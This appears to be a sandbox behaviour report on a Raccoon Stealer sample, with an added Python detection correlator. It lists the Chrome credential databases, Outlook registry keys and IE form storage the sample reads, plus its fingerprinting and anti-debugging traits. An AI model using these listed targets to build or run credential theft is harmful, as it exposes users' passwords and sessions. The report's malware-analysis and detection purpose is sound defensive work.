Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll
Is looking for software installed on the system
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004362A1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 1_2_004362A1
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 1_2_0043DA90
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0045E752 FindFirstFileExW, 1_2_0045E752
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00434721 __EH_prolog,GetLogicalDriveStringsA, 1_2_00434721
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: KqxsoH2Rhn.exe, 00000001.00000003.370416716.000000004DC8D000.00000004.00000010.sdmp Binary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&
Source: KqxsoH2Rhn.exe, 00000001.00000003.376906908.000000004DC8D000.00000004.00000010.sdmp Binary or memory string: Prod_VMware_SATA_CD00#5&280b647&0&00y

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary, 1_2_004333DD
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004322AF __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree, 1_2_004322AF

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
(This child is the delay step of the self-deletion command line recorded under "Self deletion via cmd delete"; the report contains no evidence of code being written into timeout.exe, so treat the signature as a side effect of that command chain rather than as an injection finding.)

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 1_2_004362A1
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,StrToIntA,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 1_2_00429B40
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0045084A GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0045084A
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00435C73 __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor, 1_2_00435C73
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00427AAA GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 1_2_00427AAA
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004362A1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 1_2_004362A1

Stealing of Sensitive Information:

Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.378040707.00000000047A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.377370731.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.283534842.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: KqxsoH2Rhn.exe PID: 6984, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Contains functionality to steal Internet Explorer form passwords
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 1_2_0043434E
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
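Taken together, the "Drops PE files" list and this section describe one process that stages Mozilla NSS libraries under AppData and then opens Chrome's credential databases and Outlook's profile keys. The correlator below is an added example, not report code and not a Raccoon decryptor: it scores each process on those three behaviours, excusing chrome.exe and outlook.exe from the stores they own, and reports processes above a threshold with the reasons. The event records are constructed (a simplified file/registry telemetry shape, not Sysmon's); the paths and registry keys in them are taken from this report, the control processes are invented.

```python
"""Correlate per-process file and registry activity into a credential-theft
score: staging of Mozilla NSS libraries, access to Chrome credential stores
and Outlook profile keys by a process that is not the owning application.
Added example over constructed events; not part of the report."""
from collections import defaultdict

# Libraries the sample drops so it can load nss3.dll and read Mozilla-format stores.
NSS_STAGING = {"nss3.dll", "mozglue.dll", "softokn3.dll", "freebl3.dll", "sqlite3.dll"}
# Chrome profile files named in this report (all SQLite databases).
CHROME_STORES = {"login data", "cookies", "web data", "history"}
CHROME_MARKER = "\\google\\chrome\\user data\\"
# Registry paths quoted in this report (Outlook account/profile storage).
OUTLOOK_KEYS = (
    "\\software\\microsoft\\office\\outlook\\omi account manager\\accounts",
    "\\windows nt\\currentversion\\windows messaging subsystem\\profiles\\",
)
OWNERS = {"chrome.exe": "chrome", "outlook.exe": "outlook"}   # applications allowed on their own stores


def correlate(events, threshold: int = 3) -> list:
    """Score each pid; return findings (score >= threshold) sorted by score."""
    per_pid = defaultdict(lambda: {"image": "", "nss": set(), "chrome": set(), "outlook": set()})
    for ev in events:
        rec = per_pid[ev["pid"]]
        rec["image"] = ev["image"]
        path = ev["path"].lower()
        base = path.rsplit("\\", 1)[-1]
        if ev["type"] == "file_create" and base in NSS_STAGING and "\\appdata\\" in path:
            rec["nss"].add(base)
        elif ev["type"] == "file_open" and CHROME_MARKER in path and base in CHROME_STORES:
            rec["chrome"].add(base)
        elif ev["type"] == "reg_open" and any(k in path for k in OUTLOOK_KEYS):
            rec["outlook"].add(path)
    findings = []
    for pid, rec in per_pid.items():
        owner = OWNERS.get(rec["image"].lower().rsplit("\\", 1)[-1])
        score, reasons = 0, []
        if len(rec["nss"]) >= 3:
            score += 3
            reasons.append("stages Mozilla NSS libraries")
        if owner != "chrome" and len(rec["chrome"]) >= 2:
            score += 2
            reasons.append("reads Chrome credential stores: " + ", ".join(sorted(rec["chrome"])))
        if owner != "outlook" and rec["outlook"]:
            score += 2
            reasons.append("opens Outlook profile keys")
        if score >= threshold:
            findings.append({"pid": pid, "image": rec["image"], "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: -f["score"])


# Constructed telemetry. Paths and keys for pid 6984 are the ones in this report;
# the other processes are invented controls (owning apps and a one-off reader).
_LL = r"C:\Users\user\AppData\LocalLow\qO7qM6fA3"
_CH = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
_EXE = r"C:\Users\user\Desktop\KqxsoH2Rhn.exe"
_CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EVENTS = [
    {"pid": 6984, "image": _EXE, "type": "file_create", "path": _LL + r"\nss3.dll"},
    {"pid": 6984, "image": _EXE, "type": "file_create", "path": _LL + r"\mozglue.dll"},
    {"pid": 6984, "image": _EXE, "type": "file_create", "path": _LL + r"\softokn3.dll"},
    {"pid": 6984, "image": _EXE, "type": "file_create", "path": _LL + r"\freebl3.dll"},
    {"pid": 6984, "image": _EXE, "type": "file_open", "path": _CH + r"\Login Data"},
    {"pid": 6984, "image": _EXE, "type": "file_open", "path": _CH + r"\Cookies"},
    {"pid": 6984, "image": _EXE, "type": "reg_open",
     "path": r"HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"},
    {"pid": 4120, "image": _CHROME, "type": "file_open", "path": _CH + r"\Login Data"},
    {"pid": 4120, "image": _CHROME, "type": "file_open", "path": _CH + r"\Cookies"},
    {"pid": 3008, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "type": "reg_open",
     "path": r"HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"},
    {"pid": 5212, "image": r"C:\Windows\System32\notepad.exe", "type": "file_open", "path": _CH + r"\History"},
]

if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f["pid"], f["image"], f["score"], "; ".join(f["reasons"]))
```

Scoring rather than matching any single path is deliberate: backup agents and browser-sync tools touch one Chrome database at a time, but nothing legitimate writes nss3.dll into a user's LocalLow directory and then opens Login Data and the Outlook account keys from the same process.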

Remote Access Functionality:

Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.378040707.00000000047A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.377370731.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.283534842.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: KqxsoH2Rhn.exe PID: 6984, type: MEMORYSTR